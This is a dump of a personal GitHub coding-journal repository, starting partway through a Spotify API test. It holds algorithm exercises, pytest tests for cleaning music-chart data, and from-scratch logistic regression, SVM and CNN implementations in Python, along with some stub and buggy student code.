\"spotify\": \"https://open.spotify.com/artist/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\"\n },\n \"href\": \"https://api.spotify.com/v1/artists/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"name\": \"Russell Dickerson\",\n \"type\": \"artist\",\n \"uri\": \"spotify:artist:1E2AEtxaFaJtH0lO7kgNKw\"\n }\n ],\n \"available_markets\": [\n \"AD\",\n \"AR\",\n \"AT\",\n \"AU\",\n \"BE\",\n \"BG\",\n \"BO\",\n \"BR\",\n \"CA\",\n \"CH\",\n \"CL\",\n \"CO\",\n \"CR\",\n \"CY\",\n \"CZ\",\n \"DE\",\n \"DK\",\n \"DO\",\n \"EC\",\n \"EE\",\n \"ES\",\n \"FI\",\n \"FR\",\n \"GB\",\n \"GR\",\n \"GT\",\n \"HK\",\n \"HN\",\n \"HU\",\n \"ID\",\n \"IE\",\n \"IS\",\n \"IT\",\n \"JP\",\n \"LI\",\n \"LT\",\n \"LU\",\n \"LV\",\n \"MC\",\n \"MT\",\n \"MX\",\n \"MY\",\n \"NI\",\n \"NL\",\n \"NO\",\n \"NZ\",\n \"PA\",\n \"PE\",\n \"PH\",\n \"PL\",\n \"PT\",\n \"PY\",\n \"SE\",\n \"SG\",\n \"SK\",\n \"SV\",\n \"TH\",\n \"TR\",\n \"TW\",\n \"US\",\n \"UY\"\n ],\n \"disc_number\": 1,\n \"duration_ms\": 211240,\n \"explicit\": False,\n \"external_ids\": {\n \"isrc\": \"USQX91602319\"\n },\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/track/\"\n \"6Axy0fL3FBtwx2rwl4soq9\"\n },\n \"href\": \"https://api.spotify.com/v1/tracks/6Axy0fL3FBtwx2rwl4soq9\",\n \"id\": \"6Axy0fL3FBtwx2rwl4soq9\",\n \"name\": \"Blue Tacoma\",\n \"popularity\": 78,\n \"preview_url\": \"https://p.scdn.co/mp3-preview/\"\n \"4fd8dd4532f5c256745783bba52750e59af1238f?\"\n \"cid=fd8abe6759d345499f8677c6c0adad96\",\n \"track_number\": 4,\n \"type\": \"track\",\n \"uri\": \"spotify:track:6Axy0fL3FBtwx2rwl4soq9\"\n }]\n\n response = requests.post(\n SPOTIFY_URL,\n headers={\n 'Content-type': 'application/json'\n },\n data=json.dumps(data)\n )\n\n assert response.json() == [{\n \"main_artist_id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"main_artist_name\": \"russell dickerson\",\n \"popularity\": 78,\n \"song_id\": \"6Axy0fL3FBtwx2rwl4soq9\",\n \"song_length\": 211240,\n \"song_name\": \"blue tacoma\"\n }]\n" }, { "alpha_fraction": 0.8238636255264282, "alphanum_fraction": 0.8238636255264282, "avg_line_length": 58, "blob_id": "f88bbb7dab5f46bbf26cb8ce5751877959bb0a7e", "content_id": "0d9377beef987f3f9009455b70246d53d49ccb9d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 176, "license_type": "permissive", "max_line_length": 110, "num_lines": 3, "path": "/README.md", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# Coding-Journal\nPersonal Coding records: Machine Learning, Deep Learning, Statistical Learning, Data Structures and Algorithms\n# Resumes are overrated, Code speaks for itself." }, { "alpha_fraction": 0.55859375, "alphanum_fraction": 0.5729166865348816, "avg_line_length": 28.576923370361328, "blob_id": "f2672cd5b3f8b8e200ce1028a2f09770b3c74862", "content_id": "486fe331fc266813c397981ff572582e0aed3d08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "permissive", "max_line_length": 78, "num_lines": 26, "path": "/Data Structure and Algorithms/Longest Palindromic Substring.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#Given a string s, find the longest palindromic substring in s. You may assume\n# that the maximum length of s is 1000.\ndef longestPalindrome(s: str) -> str:\n left, right = 0, len(s) - 1\n\n def is_palindrome(sub):\n left, right = 0, len(sub) - 1\n while left <= right:\n if sub[left] != sub[right]:\n return False\n else:\n left += 1\n right -= 1\n return True\n\n if is_palindrome(s):\n return s\n else:\n left_advance = longestPalindrome(s[left + 1:])\n right_advance = longestPalindrome(s[:right])\n if len(left_advance) >= len(right_advance):\n return left_advance\n else:\n return right_advance\n\nprint(longestPalindrome(\"babaddtattarraaaaa\"))" }, { "alpha_fraction": 0.5855513215065002, "alphanum_fraction": 0.5988593101501465, "avg_line_length": 31.875, "blob_id": "2128fd7f1662716a8fd5195e961be606a783a8f1", "content_id": "8d1be3352ed8f4516baad7368f0f88b77a35bfae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1586, "license_type": "permissive", "max_line_length": 74, "num_lines": 48, "path": "/Text Analysis and GCP Deployment/music1030/fuzzy_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pandas as pd\nimport pytest\n\nfrom .fuzzy import jaccard_similarity, fuzzy_merge\n\n\ndef test_jaccard():\n assert jaccard_similarity('a', 'b') == 0\n assert jaccard_similarity('c', 'c') == 1\n assert jaccard_similarity('C', 'c') == 1\n assert jaccard_similarity('ace', 'acd') == 2 / 4\n\n\ndef test_fuzzy_merge():\n df1 = pd.DataFrame(['sipping on fire'], columns=['song'])\n df2 = pd.DataFrame(['sippin’ on fire'], columns=['song'])\n\n actual = fuzzy_merge(df1, df2, on=['song'])\n\n expected = pd.DataFrame([('sipping on fire', 'sippin’ on fire')],\n columns=['song_x', 'song_y'])\n\n assert expected.equals(actual)\n\n\ndef test_fuzzy_merge_string_index():\n df1 = pd.DataFrame(['sipping on fire'], columns=['song'], index=['a'])\n df2 = pd.DataFrame(['sippin’ on fire'], columns=['song'], index=['b'])\n\n actual = fuzzy_merge(df1, df2, on=['song'])\n\n expected = pd.DataFrame([('sipping on fire', 'sippin’ on fire')],\n columns=['song_x', 'song_y'])\n\n assert expected.equals(actual)\n\n\ndef test_fuzzy_merge_spotify_lastfm_first100(datadir):\n spotify_df = pd.read_csv(os.path.join(datadir, 'spotify.csv'))\n spotify_df = spotify_df[1300:]\n lastfm_df = pd.read_csv(os.path.join(datadir, 'lastfm.csv'))\n actual = fuzzy_merge(spotify_df, lastfm_df,\n on=['song_name', 'main_artist_name'])\n mask = ((actual['song_name_x'] == 'trees get wheeled away') &\n (actual['song_name_y'] == 'the trees get wheeled away'))\n assert len(actual[mask]) == 1\n" }, { "alpha_fraction": 0.5997958183288574, "alphanum_fraction": 0.6222562789916992, "avg_line_length": 30.095237731933594, "blob_id": "3f1352f7aacf8a7e0494c4d8aebb7f4cdf035e2f", "content_id": "2a8c4535228035f9d515de32e1649d21f9c02c8f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1959, "license_type": "permissive", "max_line_length": 77, "num_lines": 63, "path": "/Text Analysis and GCP Deployment/music1030/billboard_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pandas as pd\n\nfrom .billboard import clean_artist_col, clean_billboard\n\n\ndef test_prune_dummy():\n dummy1 = pd.Series(data=['Major Lazer & DJ Snake Featuring MO'])\n pruned1 = clean_artist_col(dummy1)\n assert pruned1[0] == 'major lazer'\n dummy2 = pd.Series(data=['Selena Gomez Featuring A$AP Rocky',\n # The following two lines represent a single row\n ('Macklemore & Ryan Lewis Featuring Eric Nally,' +\n 'Melle Mel, Kool Moe Dee & Grandmaster Caz'),\n 'Young Thug And Travis Scott Featuring Quavo'])\n pruned2 = clean_artist_col(dummy2)\n assert pruned2[0] == 'selena gomez'\n assert pruned2[1] == 'macklemore'\n assert pruned2[2] == 'young thug'\n\n\ndef test_prune_full(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n pruned_col = clean_artist_col(df['artist_names'])\n\n assert not pruned_col.str.contains(' and ').any()\n assert not pruned_col.str.contains('&').any()\n assert not pruned_col.str.contains(' featuring').any()\n assert df.equals(df_copy)\n\n\ndef test_clean_partial(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n cleaned = clean_billboard(df.iloc[0:10])\n\n assert 'song_name' in cleaned.columns\n assert 'rank' in cleaned.columns\n assert 'week' in cleaned.columns\n assert not df.isnull().values.any()\n assert not df.duplicated().any()\n assert df.equals(df_copy)\n\n\ndef test_clean_full(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n cleaned = clean_billboard(df)\n\n assert 'song_name' in cleaned.columns\n assert 'rank' in cleaned.columns\n assert 'week' in cleaned.columns\n assert not df.isnull().values.any()\n assert not df.duplicated().any()\n assert df.equals(df_copy)\n" }, { "alpha_fraction": 0.7537537813186646, "alphanum_fraction": 0.7717717885971069, "avg_line_length": 46.57143020629883, "blob_id": "6bf2f3c1a02142b5a8759101ebf0e262be5513b8", "content_id": "ff1698271044ccc260bf3e29891b34dd34f96153", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 333, "license_type": "permissive", "max_line_length": 84, "num_lines": 7, "path": "/Web Interactive Data Viz-Python/README.md", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#HW 4 Plotly\nI have successfully finished all tasks, for task 4 Dash part, there are some\nthings I need to address.\nBecause the limitation of 100MB file size in GitHub, I can't push 'images' folder\nto the GitHub.\nIf you need to run the task 4 successfully, you should put the 'images' folder under\nthe directory'data/cars/images'!!!\n" }, { "alpha_fraction": 0.5670538544654846, "alphanum_fraction": 0.5804294347763062, "avg_line_length": 34.582279205322266, "blob_id": "80f8a2e35aa0f0b76099cc97bb5597c7c5268a59", "content_id": "9ac07ac7358b1ad7e7ad0afae9328081f723ed2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2841, "license_type": "permissive", "max_line_length": 79, "num_lines": 79, "path": "/Model Building From Scratch/logistic_regression.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\n\n\ndef preprocess():\n \"\"\"Return the preprocessed data set\"\"\"\n data = pd.read_csv('weatherAUS.csv')\n\n # Drop certain features any any data with null values\n data = data.drop(['Sunshine', 'Evaporation', 'Cloud3pm',\n 'Cloud9am', 'Location', 'RISK_MM', 'Date'], axis=1)\n data = data.dropna(how='any')\n\n # Change labels\n data['RainToday'].replace({'No': 0, 'Yes': 1}, inplace=True)\n data['RainTomorrow'].replace({'No': 0, 'Yes': 1}, inplace=True)\n\n # Change categorical data to integers\n categorical_columns = ['WindGustDir', 'WindDir3pm', 'WindDir9am']\n data = pd.get_dummies(data, columns=categorical_columns)\n\n # standardize data set\n scaler = preprocessing.MinMaxScaler()\n scaler.fit(data)\n data = pd.DataFrame(scaler.transform(data),\n index=data.index, columns=data.columns)\n\n y = data.pop('RainTomorrow')\n X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2)\n return X_train, X_test, y_train, y_test\n\n\nclass LogisticRegression(object):\n def __init__(self):\n self.X_train, X_test, self.y_train, y_test = preprocess()\n\n # activation function\n def sigmoid(self, x):\n \"\"\"Return the output of sigmoid fuction\"\"\"\n return 1 / (1 + np.exp(-x))\n\n # fit part\n def fit(self, X, y, learning_rate=0.01, epochs=32,\n batch_size=1, num_iter=100000):\n \"\"\"Train the model using SGD\"\"\"\n # add intercept\n intercept = np.ones((X.shape[0], 1))\n X = np.concatenate((intercept, X), axis=1)\n y = np.array(y)\n # initialize weights\n self.beta = np.zeros(X.shape[1])\n # Utilizing SGD to do weight tuning\n for i in range(epochs):\n for j in range(num_iter):\n index = np.random.randint(0, len(X) - 1)\n z = np.dot(X[index], self.beta)\n r = self.sigmoid(z)\n gradient = (r - y[index]) * X[index]\n self.beta -= learning_rate * gradient\n\n # Prediction part\n def predict(self, X):\n \"\"\"Return the prediction list\"\"\"\n # add intercept\n intercept = np.ones((X.shape[0], 1))\n X = np.concatenate((intercept, X), axis=1)\n predict_value = self.sigmoid(np.dot(X, self.beta))\n predict_value = np.array(list(map(lambda x: 1 if x > 0.5 else 0,\n predict_value)))\n return predict_value\n\n # Evaluate part\n def evaluate(self, X_test, y_test):\n \"\"\"Returns a numpy array of prediction labels\"\"\"\n self.fit(self.X_train, self.y_train)\n predict_value = self.predict(X_test)\n return predict_value\n \n \n \n \n \n \n" }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.6795580387115479, "avg_line_length": 15.545454978942871, "blob_id": "8e7375cd09e9af2ead625120eccfa4b13cf61cba", "content_id": "3e0ed0ac94202184ac996811c99e6bd16d32af86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "permissive", "max_line_length": 61, "num_lines": 11, "path": "/Text Analysis and GCP Deployment/music1030/spotify.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "from typing import List, Dict\n\nimport pandas as pd\n\n\n# YOUR CODE HERE\n\ndef clean_spotify_tracks(tracks: List[Dict]) -> pd.DataFrame:\n # TODO: Task 5\n # YOUR CODE HERE\n pass" }, { "alpha_fraction": 0.5721077919006348, "alphanum_fraction": 0.5752773284912109, "avg_line_length": 27.68181800842285, "blob_id": "7efa0ef40dfe618065410ee18e5c44e381a282a2", "content_id": "fd6419b82306c48e01317dbc979bb92a31ab5957", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 631, "license_type": "permissive", "max_line_length": 70, "num_lines": 22, "path": "/Text Analysis and GCP Deployment/music1030/billboard.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import re\n\nimport pandas as pd\n\n\ndef clean_artist_col(artist_names: pd.Series) -> pd.Series:\n # TODO: Task 9\n # YOUR CODE HERE\n pass\n\ndef clean_billboard(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Returns a cleaned billboard DataFrame.\n\n :param df: the billboard DataFrame\n :return a new cleaned DataFrame\n \"\"\"\n pruned_col = clean_artist_col(df['artist_names'])\n cleaned_df: pd.DataFrame = (df.assign(main_artist_name=pruned_col)\n .drop_duplicates()\n .dropna()\n .drop('artist_names', axis=1))\n return cleaned_df\n" }, { "alpha_fraction": 0.5189003348350525, "alphanum_fraction": 0.5223367810249329, "avg_line_length": 21.230770111083984, "blob_id": "316772ac0c3768a28d75be0ffcf18f478f2a408d", "content_id": "a6094cebee415db9cea3924df368724366b6c769", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "permissive", "max_line_length": 58, "num_lines": 13, "path": "/Data Structure and Algorithms/Tree and Traverse Methods.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "class Node(object):\n \"\"\"Node\"\"\"\n def __init__(self, elem=-1, lchild=None, rchild=None):\n self.elem = elem\n self.lchild = lchild\n self.rchild = rchild\n\n\nclass Tree(object):\n \"\"\"Tree\"\"\"\n def _init_(self):\n self.root = Node()\n sefl.myQueue = []\n\n\n" }, { "alpha_fraction": 0.5578485131263733, "alphanum_fraction": 0.5661910176277161, "avg_line_length": 32.74074172973633, "blob_id": "6cb481de1bade29c881232e3dfe5dc0091fdc87b", "content_id": "e068b5ffb2389fe50c45a4d88dcd6a606698cf77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4572, "license_type": "permissive", "max_line_length": 79, "num_lines": 135, "path": "/Model Building From Scratch/svm.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\nimport cvxpy as cp\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\ndef preprocess():\n data = pd.read_csv('weatherAUS.csv')\n\n # Drop certain features any any data with null values\n data = data.drop(['Sunshine', 'Evaporation', 'Cloud3pm', 'Cloud9am', \n 'Location', 'RISK_MM','Date'], axis=1)\n data = data.dropna(how='any')\n\n # Change labels\n data['RainToday'].replace({'No': 0, 'Yes': 1}, inplace = True)\n data['RainTomorrow'].replace({'No': -1, 'Yes': 1}, inplace = True)\n\n # Change categorical data to integers\n categorical_columns = ['WindGustDir', 'WindDir3pm', 'WindDir9am']\n data = pd.get_dummies(data, columns=categorical_columns)\n\n # standardize data set\n scaler = preprocessing.MinMaxScaler()\n scaler.fit(data)\n data = pd.DataFrame(scaler.transform(data), \n index=data.index, columns=data.columns)\n y = data.pop('RainTomorrow')\n\n X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2)\n return X_train, X_test, y_train, y_test\n\n\nclass LinearSVM(object):\n \"\"\"A support vector machine with linear kernel that trains using\n the primal convex minimization problem\"\"\"\n\n def __init__(self, C=1.0):\n self.C = C\n self.w = None\n self.b = None\n\n def train(self, X, y):\n \"\"\"Use training arrays to set the values of self.w and self.b\"\"\"\n if isinstance(X, pd.DataFrame):\n X = X.values\n if isinstance(y, pd.DataFrame): \n y = y.values\n y = np.array([-1 if x == 0 else 1 for x in y])\n nrows, ncols = np.shape(X)\n ζ = cp.Variable(nrows)\n # insert the correct length for w\n w = cp.Variable(ncols)\n b = cp.Variable()\n # use cp.sum_squares and cp.sum to form the objective function\n objective = cp.Minimize(0.5 * cp.sum_squares(w) + self.C * cp.sum(ζ))\n # apply the optimization constraints (hint: cp.multiply)\n constraints = [cp.multiply(y, X * w + b) >= 1 - ζ,\n ζ >= 0]\n prob = cp.Problem(objective, constraints)\n prob.solve()\n self.w = w.value\n self.b = b.value\n\n def predict(self, X_test):\n \"\"\"Return a numpy array of prediction labels\"\"\"\n if isinstance(X_test, pd.DataFrame):\n X_test = X_test.values\n predict = np.dot(X_test, self.w) + self.b\n predict = [1 if x >= 0 else 0 for x in predict]\n return np.array(predict)\n\n\ndef linear_kernel(a, b):\n \"\"\"Return the data converted by linear kernel\"\"\"\n return np.dot(a, b.T)\n\n\ndef polynomial_kernel(a, b):\n \"\"\"Return the data converted by polynomial kernel\"\"\"\n return (np.dot(a, b.T) + 1) ** 2\n\n\ndef rbf_kernel(a, b):\n \"\"\"Return the data converted by RBF kernel\"\"\"\n return np.exp(-(np.dot(a, a.T) + np.dot(b, b.T) - 2 * np.dot(a, b.T)))\n\n\nclass SVM(object):\n def __init__(self, kernel=rbf_kernel, C=1.0):\n self.kernel = kernel\n self.C = C\n self.X = None\n self.y = None\n self.α = None\n self.b = None\n\n def train(self, X, y):\n \"\"\"Use training arrays X and y to set the values of \n self.α and self.b\"\"\"\n if isinstance(X, pd.DataFrame):\n X = X.values\n if isinstance(y, pd.DataFrame):\n y = y.values\n y = np.array([-1 if x == 0 else 1 for x in y])\n nrows, ncols = np.shape(X)\n α = cp.Variable(nrows)\n w = cp.Variable(ncols)\n # form a kernel matrix (as a numpy array)\n K = self.kernel(X, X)\n objective = cp.Minimize(1/2 * cp.quad_form(cp.multiply(α, y), K)\n - cp.sum(α))\n # list the constraints for the optimization problem\n constraints = [α >= 0,\n α <= self.C,\n α * y == 0]\n prob = cp.Problem(objective, constraints)\n prob.solve()\n self.X = X\n self.y = y\n # fill in the value of α\n self.α = α.value\n # fill in the value of b\n self.b = np.mean(y - np.dot(X, np.dot(X.T, self.α * self.y)))\n\n def predict(self, X_test):\n \"\"\"Return a numpy array of prediction labels\"\"\"\n if isinstance(X_test, pd.DataFrame):\n X_test = X_test.values\n predict = np.dot(rbf_kernel(X_test, X_test), self.α * self.y) + self.b\n predict = [1 if x >= 0 else 0 for x in predict]\n return np.array(predict)\n" }, { "alpha_fraction": 0.5079226493835449, "alphanum_fraction": 0.5447012782096863, "avg_line_length": 33.5728645324707, "blob_id": "6cf1fce36b078a26cc2613767a105699c26110ca", "content_id": "83b8667f45e4fed18266e4acca4b753152eeccf9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "permissive", "max_line_length": 91, "num_lines": 199, "path": "/Model Building From Scratch/CNN.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom functools import reduce\n\n\nclass Conv2D(object):\n def __init__(self, shape, output_channels, ksize=3, stride=1, method='VALID'):\n self.input_shape = shape\n self.output_channels = output_channels\n self.input_channels = shape[-1]\n self.batchsize = shape[0]\n self.stride = stride\n self.ksize = ksize\n self.method = method\n self.weights = np.random.standard_normal(\n (ksize, ksize, self.input_channels, self.output_channels))\n\n if method == 'VALID':\n self.eta = np.zeros((shape[0], (shape[1] - ksize + 1) //\n self.stride, (shape[1] - ksize + 1) // self.stride,\n self.output_channels))\n\n if method == 'SAME':\n self.eta = np.zeros((shape[0], shape[1]//self.stride,\n shape[2]//self.stride,self.output_channels))\n\n self.output_shape = self.eta.shape\n\n\n def forward(self, x):\n col_weights = self.weights.reshape([-1, self.output_channels])\n if self.method == 'SAME':\n x = np.pad(x, (\n (0, 0), (self.ksize // 2, self.ksize // 2),\n (self.ksize // 2, self.ksize // 2), (0, 0)),\n 'constant', constant_values=0)\n\n self.col_image = []\n conv_out = np.zeros(self.eta.shape)\n for i in range(self.batchsize):\n img_i = x[i][np.newaxis, :]\n self.col_image_i = im2col(img_i, self.ksize, self.stride)\n conv_out[i] = np.reshape(np.dot(self.col_image_i,\n col_weights),\n self.eta[0].shape)\n self.col_image.append(self.col_image_i)\n self.col_image = np.array(self.col_image)\n return conv_out\n\n\n\ndef im2col(image, ksize, stride):\n # image is a 4d tensor([batchsize, width ,height, channel])\n image_col = []\n for i in range(0, image.shape[1] - ksize + 1, stride):\n for j in range(0, image.shape[2] - ksize + 1, stride):\n col = image[:, i:i + ksize, j:j + ksize, :].reshape([-1])\n image_col.append(col)\n image_col = np.array(image_col)\n\n return image_col\n\n\nclass Relu(object):\n def __init__(self, shape):\n self.eta = np.zeros(shape)\n self.x = np.zeros(shape)\n self.output_shape = shape\n\n def forward(self, x):\n self.x = x\n return np.maximum(x, 0)\n\n\nclass MaxPooling(object):\n def __init__(self, shape, ksize=2, stride=2):\n self.input_shape = shape\n self.ksize = ksize\n self.stride = stride\n self.output_channels = shape[-1]\n self.index = np.zeros(shape)\n self.output_shape = [shape[0], shape[1] // self.stride,\n shape[2] // self.stride, self.output_channels]\n\n\n def forward(self, x):\n out = np.zeros([x.shape[0], x.shape[1] // self.stride, x.shape[2] //\n self.stride, self.output_channels])\n\n for b in range(x.shape[0]):\n for c in range(self.output_channels):\n for i in range(0, x.shape[1], self.stride):\n for j in range(0, x.shape[2], self.stride):\n out[b, i // self.stride, j // self.stride, c] = np.max(\n x[b, i:(i + self.ksize), j:(j + self.ksize), c])\n index = np.argmax(x[b, i:i + self.ksize, j:j + self.ksize, c])\n self.index[b, i+index//self.stride, j + index % self.stride, c] = 1\n return out\n\n\nclass DenselyConnect(object):\n def __init__(self, shape, output_num=2):\n self.input_shape = shape\n self.batchsize = shape[0]\n\n input_len = reduce(lambda x, y: x * y, shape[1:])\n\n self.weights = np.random.standard_normal((input_len, output_num))\n\n self.output_shape = [self.batchsize, output_num]\n\n\n def forward(self, x):\n self.x = x.reshape([self.batchsize, -1])\n output = np.dot(self.x, self.weights)\n return output\n\n\nclass Softmax(object):\n def __init__(self, shape):\n self.softmax = np.zeros(shape)\n self.eta = np.zeros(shape)\n self.batchsize = shape[0]\n\n\n def predict(self, prediction):\n exp_prediction = np.zeros(prediction.shape)\n self.softmax = np.zeros(prediction.shape)\n for i in range(self.batchsize):\n prediction[i, :] -= np.max(prediction[i, :])\n exp_prediction[i] = np.exp(prediction[i])\n self.softmax[i] = exp_prediction[i]/np.sum(exp_prediction[i])\n return self.softmax\n\n\nif __name__ == \"__main__\":\n img = np.ones((1, 28, 28, 1))\n conv1 = Conv2D(img.shape, 3, 3, 1)\n layer1 = conv1.forward(img)\n assert layer1.shape == (1, 26, 26, 3)\n print('The shape of conv1 layer is:', layer1.shape)\n\n relu1 = Relu(layer1.shape)\n layer2 = relu1.forward(layer1)\n assert layer2.shape == (1, 26, 26, 3)\n print('The shape of relu1 layer is:', layer2.shape)\n\n maxpooling1 = MaxPooling(layer2.shape, 2, 2)\n layer3 = maxpooling1.forward(layer2)\n assert layer3.shape == (1, 13, 13, 3)\n print('The shape of maxpooling1 layer is:', layer3.shape)\n\n conv2 = Conv2D(layer3.shape, 5, 4, 1)\n layer4 = conv2.forward(layer3)\n assert layer4.shape == (1, 10, 10, 5)\n print('The shape of conv2 layer is:', layer4.shape)\n\n relu2 = Relu(layer4.shape)\n layer5 = relu1.forward(layer4)\n assert layer5.shape == (1, 10, 10, 5)\n print('The shape of relu2 layer is:', layer5.shape)\n\n maxpooling2 = MaxPooling(layer5.shape, 2, 2)\n layer6 = maxpooling2.forward(layer5)\n assert layer6.shape == (1, 5, 5, 5)\n print('The shape of maxpooling2 layer is:', layer6.shape)\n\n dense1 = DenselyConnect(layer6.shape, 125)\n layer7 = dense1.forward(layer6)\n assert layer7.shape == (1, 125)\n print('The shape of flaten layer is:', layer7.shape)\n\n dense2 = DenselyConnect(layer7.shape, 10)\n layer8 = dense2.forward(layer7)\n assert layer8.shape == (1, 10)\n print('The shape of output layer is:', layer8.shape)\n\n softmax = Softmax(layer8.shape)\n layer9 = softmax.predict(layer8)\n assert layer9.shape == (1, 10)\n print('The shape of softmax layer is:', layer9.shape)\n\n img = np.array([[-11, 4, 1, -1, 12, 9],\n [1, -4, 3, 0, 1, 10],\n [9, 2, -5, -7, -10, -8],\n [8, -2, 1, -11, -5, 7],\n [-5, 0, -5, -1, -5, 3],\n [-8, 2, 6, 5, -3, -4]])\n\n img = np.pad(img, (1,1), 'reflect')\n print(img)\n img = img.reshape(1, 8, 8, 1)\n conv = Conv2D(img.shape, 1, 3, 1)\n conv.weights = np.array([[2,8,11],\n [-7,-6,-6],\n [1,-9,-11]])\n conv.weights = conv.weights.reshape(3,3,1,1)\n print(conv.weights.shape)\n output = conv.forward(img)\n print(output)" }, { "alpha_fraction": 0.5542288422584534, "alphanum_fraction": 0.5830845832824707, "avg_line_length": 37.67307662963867, "blob_id": "72ee92a54ba04e252561e9fc035e5031c8905cfe", "content_id": "896c1e3450a0458701b038537310901150ee35f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 71, "num_lines": 52, "path": "/Data Structure and Algorithms/K Closest Points to Origin.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# We have a list of points on the plane.\n# Find the K closest points to the origin (0, 0).\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n max_heap = [i for i in range(K)]\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n for i in range(K, len(points)):\n if square_dis[i] < curr_max:\n max_heap = [i for i in max_heap if i != curr_max_idx]\n max_heap.append(i)\n curr_max = max([square_dis[j] for j in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n return [points[i] for i in max_heap]\n\n\n# faster version:\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n max_heap = [i for i in range(K)]\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n curr_max_idx_heap = max_heap.index(curr_max_idx)\n for i in range(K, len(points)):\n if square_dis[i] < curr_max:\n max_heap[curr_max_idx_heap] = i\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n curr_max_idx_heap = max_heap.index(curr_max_idx)\n return [points[i] for i in max_heap]\n\n\n# sort version(much faster):\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n hash_dic = dict((key, value) for key, value in\n zip(list(range(len(points))), square_dis))\n sorted_dic = sorted(hash_dic.items(), key=lambda x: x[1])\n index_k = [sorted_dic[k][0] for k in range(K)]\n return [points[k] for k in index_k]\n\nkClosest([[-95,76],[17,7],[-55,-58],[53,20],[-69,-8],[-57,87],[-2,-42],\n [-10,-87],[-36,-57],[97,-39],[97,49]],5)" }, { "alpha_fraction": 0.5135593414306641, "alphanum_fraction": 0.5237287878990173, "avg_line_length": 33.764705657958984, "blob_id": "01e4aa07862d950fc78becef795a3be3971965d1", "content_id": "09ec0dc6ebccdd661d2770103194b3f2d5c94745", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "permissive", "max_line_length": 74, "num_lines": 17, "path": "/Data Structure and Algorithms/First Unique Character in a String.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#Given a string, find the first non-repeating character in\n# it and return it's index. If it doesn't exist, return -1.\n\ndef firstUniqChar(s: str) -> int:\n if not s:\n return -1\n count = {}\n for char in s:\n count[char] = count.get(char, 0) + 1\n distinct = list(filter(lambda x: count[x] == 1, [key for key, value in\n zip(count.keys(),\n count.values())]))\n if not distinct:\n return -1\n return min([s.find(item) for item in distinct])\n\nfirstUniqChar(\"leetcode\")" } ]
19
AvatarGanymede/ChinesePaintingStyle
